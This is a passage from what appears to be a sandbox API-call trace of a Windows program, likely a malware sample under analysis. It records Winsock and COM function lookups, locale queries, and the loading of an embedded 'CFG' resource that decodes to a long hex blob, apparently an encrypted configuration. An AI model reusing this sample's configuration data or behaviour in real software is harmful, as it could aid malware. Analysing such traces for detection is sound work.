lpProcName="VarNot") returned 0x76ebec66 [0050.649] GetProcAddress (hModule=0x76e40000, lpProcName="VarAdd") returned 0x76e65934 [0050.649] GetProcAddress (hModule=0x76e40000, lpProcName="VarSub") returned 0x76ebd332 [0050.649] GetProcAddress (hModule=0x76e40000, lpProcName="VarMul") returned 0x76ebdbd4 [0050.649] GetProcAddress (hModule=0x76e40000, lpProcName="VarDiv") returned 0x76ebe405 [0050.649] GetProcAddress (hModule=0x76e40000, lpProcName="VarIdiv") returned 0x76ebf00a [0050.649] GetProcAddress (hModule=0x76e40000, lpProcName="VarMod") returned 0x76ebf15e [0050.649] GetProcAddress (hModule=0x76e40000, lpProcName="VarAnd") returned 0x76e65a98 [0050.649] GetProcAddress (hModule=0x76e40000, lpProcName="VarOr") returned 0x76ebecfa [0050.649] GetProcAddress (hModule=0x76e40000, lpProcName="VarXor") returned 0x76ebee2e [0050.650] GetProcAddress (hModule=0x76e40000, lpProcName="VarCmp") returned 0x76e5b0dc [0050.650] GetProcAddress (hModule=0x76e40000, lpProcName="VarI4FromStr") returned 0x76e56fab [0050.650] GetProcAddress (hModule=0x76e40000, lpProcName="VarR4FromStr") returned 0x76e601a0 [0050.650] GetProcAddress (hModule=0x76e40000, lpProcName="VarR8FromStr") returned 0x76e5699e [0050.650] GetProcAddress (hModule=0x76e40000, lpProcName="VarDateFromStr") returned 0x76e66ba7 [0050.650] GetProcAddress (hModule=0x76e40000, lpProcName="VarCyFromStr") returned 0x76e86c12 [0050.650] GetProcAddress (hModule=0x76e40000, lpProcName="VarBoolFromStr") returned 0x76e5dbd1 [0050.650] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromCy") returned 0x76e67fdc [0050.650] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromDate") returned 0x76e57a2a [0050.650] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromBool") returned 0x76e60355 [0050.651] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xc4 [0050.651] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xc8 [0050.651] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc [0050.652] QueryPerformanceCounter (in: lpPerformanceCount=0x18fb8c | out: lpPerformanceCount=0x18fb8c*=17099069399) returned 1 [0050.652] GetTickCount () returned 0x1147031 [0050.652] GetLocalTime (in: lpSystemTime=0x18fb84 | out: lpSystemTime=0x18fb84*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x10, wMinute=0x2d, wSecond=0x17, wMilliseconds=0x369)) [0050.652] GetLocalTime (in: lpSystemTime=0x18fb84 | out: lpSystemTime=0x18fb84*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x10, wMinute=0x2d, wSecond=0x17, wMilliseconds=0x369)) [0050.652] QueryPerformanceCounter (in: lpPerformanceCount=0x18fb8c | out: lpPerformanceCount=0x18fb8c*=17099102107) returned 1 [0050.652] GetTickCount () returned 0x1147031 [0050.652] GetLocalTime (in: lpSystemTime=0x18fb84 | out: lpSystemTime=0x18fb84*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x10, wMinute=0x2d, wSecond=0x17, wMilliseconds=0x369)) [0050.652] GetLocalTime (in: lpSystemTime=0x18fb84 | out: lpSystemTime=0x18fb84*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x10, wMinute=0x2d, wSecond=0x17, wMilliseconds=0x369)) [0050.652] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76620000 [0050.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0050.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x1f882bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0050.653] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstanceEx") returned 0x76669d4e [0050.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0050.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x1f7288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0050.653] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeEx") returned 0x766609ad [0050.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0050.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x1f882bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0050.653] GetProcAddress (hModule=0x76620000, lpProcName="CoAddRefServerProcess") returned 0x76683cf3 [0050.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0050.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x1f882bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0050.653] GetProcAddress (hModule=0x76620000, lpProcName="CoReleaseServerProcess") returned 0x76684314 [0050.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0050.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x1f882bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0050.653] GetProcAddress (hModule=0x76620000, lpProcName="CoResumeClassObjects") returned 0x7662ea02 [0050.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0050.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x1f882bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0050.654] GetProcAddress (hModule=0x76620000, lpProcName="CoSuspendClassObjects") returned 0x7668bb02 [0050.654] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0050.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0050.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x1f8f48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0050.654] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeConditionVariable") returned 0x77c78456 [0050.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0050.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x1f882bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0050.654] GetProcAddress (hModule=0x76d30000, lpProcName="WakeConditionVariable") returned 0x77ce7de4 [0050.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0050.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x1f8f48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0050.654] GetProcAddress (hModule=0x76d30000, lpProcName="WakeAllConditionVariable") returned 0x77ca409d [0050.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0050.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x1f8f48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0050.655] GetProcAddress (hModule=0x76d30000, lpProcName="SleepConditionVariableCS") returned 0x76dc4b32 [0050.655] GetThreadLocale () returned 0x409 [0050.655] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0050.655] GetCurrentThreadId () returned 0xa68 [0050.655] GetCurrentThreadId () returned 0xa68 [0050.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x18f734, cchData=256 | out: lpLCData="2") returned 2 [0050.655] GetThreadLocale () returned 0x409 [0050.655] EnumCalendarInfoW (lpCalInfoEnumProc=0x41fb08, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0050.655] GetThreadLocale () returned 0x409 [0050.655] EnumCalendarInfoW (lpCalInfoEnumProc=0x41fbac, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0050.655] GetCurrentThreadId () returned 0xa68 [0050.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x18f730, cchData=256 | out: lpLCData="Sun") returned 4 [0050.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x18f730, cchData=256 | out: lpLCData="Sunday") returned 7 [0050.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x18f730, cchData=256 | out: lpLCData="Mon") returned 4 [0050.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x18f730, cchData=256 | out: lpLCData="Monday") returned 7 [0050.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x18f730, cchData=256 | out: lpLCData="Tue") returned 4 [0050.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x18f730, cchData=256 | out: lpLCData="Tuesday") returned 8 [0050.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x18f730, cchData=256 | out: lpLCData="Wed") returned 4 [0050.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x18f730, cchData=256 | out: lpLCData="Wednesday") returned 10 [0050.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x18f730, cchData=256 | out: lpLCData="Thu") returned 4 [0050.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x18f730, cchData=256 | out: lpLCData="Thursday") returned 9 [0050.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x18f730, cchData=256 | out: lpLCData="Fri") returned 4 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x18f730, cchData=256 | out: lpLCData="Friday") returned 7 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x18f730, cchData=256 | out: lpLCData="Sat") returned 4 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x18f730, cchData=256 | out: lpLCData="Saturday") returned 9 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x18f734, cchData=256 | out: lpLCData="Jan") returned 4 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x18f734, cchData=256 | out: lpLCData="January") returned 8 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x18f734, cchData=256 | out: lpLCData="Feb") returned 4 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x18f734, cchData=256 | out: lpLCData="February") returned 9 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x18f734, cchData=256 | out: lpLCData="Mar") returned 4 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x18f734, cchData=256 | out: lpLCData="March") returned 6 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x18f734, cchData=256 | out: lpLCData="Apr") returned 4 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x18f734, cchData=256 | out: lpLCData="April") returned 6 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x18f734, cchData=256 | out: lpLCData="May") returned 4 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x18f734, cchData=256 | out: lpLCData="May") returned 4 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x18f734, cchData=256 | out: lpLCData="Jun") returned 4 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x18f734, cchData=256 | out: lpLCData="June") returned 5 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x18f734, cchData=256 | out: lpLCData="Jul") returned 4 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x18f734, cchData=256 | out: lpLCData="July") returned 5 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x18f734, cchData=256 | out: lpLCData="Aug") returned 4 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x18f734, cchData=256 | out: lpLCData="August") returned 7 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x18f734, cchData=256 | out: lpLCData="Sep") returned 4 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x18f734, cchData=256 | out: lpLCData="September") returned 10 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x18f734, cchData=256 | out: lpLCData="Oct") returned 4 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x18f734, cchData=256 | out: lpLCData="October") returned 8 [0050.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x18f734, cchData=256 | out: lpLCData="Nov") returned 4 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x18f734, cchData=256 | out: lpLCData="November") returned 9 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x18f734, cchData=256 | out: lpLCData="Dec") returned 4 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x18f734, cchData=256 | out: lpLCData="December") returned 9 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x18f784, cchData=256 | out: lpLCData="$") returned 2 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x18f784, cchData=256 | out: lpLCData="0") returned 2 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x18f784, cchData=256 | out: lpLCData="0") returned 2 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x18f97c, cchData=2 | out: lpLCData=",") returned 2 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x18f97c, cchData=2 | out: lpLCData=".") returned 2 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x18f784, cchData=256 | out: lpLCData="2") returned 2 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x18f97c, cchData=2 | out: lpLCData="/") returned 2 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x18f73c, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x18f73c, cchData=256 | out: lpLCData="1") returned 2 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x18f73c, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x18f73c, cchData=256 | out: lpLCData="1") returned 2 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x18f97c, cchData=2 | out: lpLCData=":") returned 2 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x18f784, cchData=256 | out: lpLCData="AM") returned 3 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x18f784, cchData=256 | out: lpLCData="PM") returned 3 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x18f784, cchData=256 | out: lpLCData="0") returned 2 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f784, cchData=256 | out: lpLCData="0") returned 2 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x18f784, cchData=256 | out: lpLCData="0") returned 2 [0050.657] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x18f97c, cchData=2 | out: lpLCData=",") returned 2 [0050.658] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77230000 [0050.658] GetProcAddress (hModule=0x77230000, lpProcName="WSAIoctl") returned 0x77232fe7 [0050.658] GetProcAddress (hModule=0x77230000, lpProcName="__WSAFDIsSet") returned 0x77236a8a [0050.658] GetProcAddress (hModule=0x77230000, lpProcName="closesocket") returned 0x77233918 [0050.658] GetProcAddress (hModule=0x77230000, lpProcName="ioctlsocket") returned 0x77233084 [0050.659] GetProcAddress (hModule=0x77230000, lpProcName="WSAGetLastError") returned 0x772337ad [0050.659] GetProcAddress (hModule=0x77230000, lpProcName="WSAStartup") returned 0x77233ab2 [0050.659] GetProcAddress (hModule=0x77230000, lpProcName="WSACleanup") returned 0x77233c5f [0050.659] GetProcAddress (hModule=0x77230000, lpProcName="accept") returned 0x772368b6 [0050.659] GetProcAddress (hModule=0x77230000, lpProcName="bind") returned 0x77234582 [0050.659] GetProcAddress (hModule=0x77230000, lpProcName="connect") returned 0x77236bdd [0050.659] GetProcAddress (hModule=0x77230000, lpProcName="getpeername") returned 0x77237147 [0050.660] GetProcAddress (hModule=0x77230000, lpProcName="getsockname") returned 0x772330af [0050.660] GetProcAddress (hModule=0x77230000, lpProcName="getsockopt") returned 0x7723737d [0050.660] GetProcAddress (hModule=0x77230000, lpProcName="htonl") returned 0x77232d57 [0050.660] GetProcAddress (hModule=0x77230000, lpProcName="htons") returned 0x77232d8b [0050.660] GetProcAddress (hModule=0x77230000, lpProcName="inet_addr") returned 0x7723311b [0050.660] GetProcAddress (hModule=0x77230000, lpProcName="inet_ntoa") returned 0x7723b131 [0050.660] GetProcAddress (hModule=0x77230000, lpProcName="listen") returned 0x7723b001 [0050.661] GetProcAddress (hModule=0x77230000, lpProcName="ntohl") returned 0x77232d57 [0050.661] GetProcAddress (hModule=0x77230000, lpProcName="ntohs") returned 0x77232d8b [0050.661] GetProcAddress (hModule=0x77230000, lpProcName="recv") returned 0x77236b0e [0050.661] GetProcAddress (hModule=0x77230000, lpProcName="recvfrom") returned 0x7723b6dc [0050.661] GetProcAddress (hModule=0x77230000, lpProcName="select") returned 0x77236989 [0050.661] GetProcAddress (hModule=0x77230000, lpProcName="send") returned 0x77236f01 [0050.661] GetProcAddress (hModule=0x77230000, lpProcName="sendto") returned 0x772334b5 [0050.662] GetProcAddress (hModule=0x77230000, lpProcName="setsockopt") returned 0x772341b6 [0050.662] GetProcAddress (hModule=0x77230000, lpProcName="shutdown") returned 0x7723449d [0050.662] GetProcAddress (hModule=0x77230000, lpProcName="socket") returned 0x77233eb8 [0050.662] GetProcAddress (hModule=0x77230000, lpProcName="gethostbyaddr") returned 0x77246c01 [0050.662] GetProcAddress (hModule=0x77230000, lpProcName="gethostbyname") returned 0x77247673 [0050.662] GetProcAddress (hModule=0x77230000, lpProcName="getprotobyname") returned 0x772468b3 [0050.663] GetProcAddress (hModule=0x77230000, lpProcName="getprotobynumber") returned 0x772467c4 [0050.663] GetProcAddress (hModule=0x77230000, lpProcName="getservbyname") returned 0x77246ef3 [0050.663] GetProcAddress (hModule=0x77230000, lpProcName="getservbyport") returned 0x77246d62 [0050.663] GetProcAddress (hModule=0x77230000, lpProcName="gethostname") returned 0x7723a05b [0050.663] GetProcAddress (hModule=0x77230000, lpProcName="getaddrinfo") returned 0x77234296 [0050.663] GetProcAddress (hModule=0x77230000, lpProcName="freeaddrinfo") returned 0x77234b1b [0050.664] GetProcAddress (hModule=0x77230000, lpProcName="getnameinfo") returned 0x772367b7 [0050.664] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4edec0 | out: lpWSAData=0x4edec0) returned 0 [0050.675] GetACP () returned 0x4e4 [0050.675] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fb8c | out: lpCPInfo=0x18fb8c) returned 1 [0050.676] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x4f5410 [0050.676] LoadResource (hModule=0x400000, hResInfo=0x4f5410) returned 0x4f7718 [0050.676] SizeofResource (hModule=0x400000, hResInfo=0x4f5410) returned 0x16c5 [0050.676] LockResource (hResData=0x4f7718) returned 0x4f7718 [0050.676] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x18fab8 | out: lpCPInfo=0x18fab8) returned 1 [0050.676] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f6b358, cbMultiByte=5829, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5829 [0050.676] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f6b358, cbMultiByte=5829, lpWideCharStr=0x1f6ca8c, cchWideChar=5829 | out: lpWideCharStr="58\r\n323C79A29854E7D77EF09C51B1C6B2F941E4EC5C463F4837A224800CA392BC1A\r\n62B36E66DC132D4A00C18D178FA396495E49B98025EE7DE281AB23291D07678B\r\n95624BD65AF47A017B05FB514E16EB7A6C6B7EC3236A84717E0700A03B416E2D\r\nEEACF2C0DDBF08226518C01EF1FCDCAA5F2763FF646E20E0907C660F6F81A1EC\r\nE953848B806667D9C61385B5E42A5D875D505B1E153DAEDAEFF33A37B367F01D\r\nAAE42C93F3818BF896088E10C4EA48FCD5EF96FCD712892246D74B4B4C35B07A\r\nB0ECEB8CB9C0765050D5FE93CEDDAA64E9145687437453D75078E821F5046554\r\n02CEDCE9EE5CFA606C71FD1E5D19DB2BED23E1871CCD2F8DAC2AD89D072E7324\r\nCC275128D695C479D80F78AFB7DBA890BFE15BC03B511B3819FD3945E9AACF9E\r\nB9786D7A99D915C32EF74FA597F5715EEDF33AFA20916340F3BB4408374220A8\r\n1FFB4AF77C8FC78423E778BF96F5390D465B83A1A0D257C4658A4701B89C613F\r\n3C332567160F2163122509209DB1FC422C404416E2C32342F79CACB13BAC5B90\r\n592A6F8E5DEDAF9CCB0096CF3228CB8BBD965D06F0945B2AAC8446E0BEDC523A\r\n30CE426125E89E9FB00A8235EDA9BC016FFD8211CD6A8953DF4D6B6F9711FE46\r\nB0ADD6769A7DD0C0B3EE26D1536F7D8ABD74933429A60784AE812ACE7EA892F5\r\n7B60F9A1DE4A310A74FF5F26FD12AD432E04DBD6D6094601559CC0C5C8435F7F\r\nEE09EC8F5BFD77FA1A0A6FD45CD1A176F94B1F78CDCF6233A79AAAA9350D57E2\r\n491299C954CCD7BD4BC1795C0C117AFF58AA48E6152984DE8EE551747AEFD8BF\r\n8FFBB7C6F39AC7A7EF452AE83B525444139BEBA57B6883F936A9F399C85384B5\r\n00E2B36A0AAF3715D3F537A3146975B6FA7713094A50726364FB52AB5FF610B9\r\n1E4B4690788594B431F0E6E7F6832AE62258CDCA2A56FB1529EFE55996F9A1AD\r\n7C49D29AC18AE567EBD34C756DF468743D84FE94247667879AC02EBE7EBD6A06\r\nC166B61785523A98E1E5D395B6E185AE757C158FBD162463F1A087D91044A855\r\n68EC2B9F747E3FB6B875D3C674B44023103EFFCC3BA61AAC3B039C93C234DB28\r\n24D1519BEDD68BD57FC2AB1939A18D82EFD8E878BC2D0FE2D5900FB5E64FE190\r\nE82EBF0AF73FFDF41C1C1B541FCAF005A70A8B8C8AF51AE1CED6495FD125EA23\r\nD32C9F85695452BC8D6DF941B48C942D3291138B5E1C636F769CB4AA8ADD13C5\r\n10E90E6BD0F6B192355C7F5B9B6C876928ECF08EA9FA7C35BDF5278D0DCD04A8\r\n8B6BA2DAAA70EADC3C7E12C8099A90637EED11795107E14BE56240A8703582EF\r\n1415CAF26A42B167D322E88977AEC7C8EC6C9C6E5F8B9310B96D842896A7537C\r\n94043DD368639B3BB37E18C610DED6B1C42E4072028C6EE363D8C96BF0077399\r\nD9848D2D0FEAAD025CE895362F0968CD7AD863FD1B6C798990D6549DD86F2F7A\r\n61E7312219454B104AFA6D21B9FCD251238C70977807C8EF64EB95EDEDC7DE95\r\n8BDD5180DBA57A3A5F9A5BB15217D61059479C53F057818D91E40B06FAA23F0D\r\n562F398B093C63674007A8A5CC3C9FF8671F56C2845F38BB6CB772BC2737B8A9\r\nA6690E996B95AE0B479029F3CACB9E644B0806D8D4739032CEBDC0F03D6DD4E9\r\n12CA628B4A0C655BF6BEA42F3C8615705D6085D63A918749DBEC5F4655A6D922\r\nED8056EAF7D894AFF869C52A64C23C3791E2CE99871A2EF6D99E4A2FC774964E\r\n9757F65C88D534B3F2A6FFABB97F72D778DE75310F9D5BD1E6F015B941D6E93B\r\nCA2A73760B5C4A557E38DB2C99223ECB0F81EF7B74873583FEF18280E0167AD8\r\n5582B23B4D6BEE6D748457A8A51D85FCF853B9DEF8735A3E67CC083B0EA2E3F5\r\nF498F4739FE7E72A8685B1D5C1A6B9C68F35256ABC7AA2B28352E10186A584AE\r\nDD6D73762BF885B0A77AA39DBC46699ED64DA8F125D4E9B6349A7FA542BBD4B0\r\n7333A6011CF2C3CE751F90AE973EC038F95AEA55E4ABDB5FEBCF658737E99FE9\r\n86C411F3B442F5B0F0084EFC51678E24D60B71EB909281B0C35740A866E0683A\r\n19D595A4AC83B9888F0846B83EDFDAB77AE70618E4E81746A2E5AB25C19DAF93\r\nF705F5C506F2F1FAFAB9E04DB51E04BC4786EAF0C7892F25AB539405B11128A9\r\n22CDCCFE228D5A8C37478C880B969FC70F328A64F075D55ED530DA555BAFE6AD\r\n68BFE7E8FB152CE2B76EB4D565D337B6D0622BB6882028E5D7859D72CCD2F49A\r\nDA66531F671E350461914D4B92DFDF9497ACB289E8BA471DB5B608AC28BD5D58\r\n29BA5E234B545D06B50E9F2D476D1C7C443330CFC249BB7FE0A285C30E88C651\r\nD4D685C14EBA6F7E88BD9E07099BC2C3F231589A859DDDE04A6E3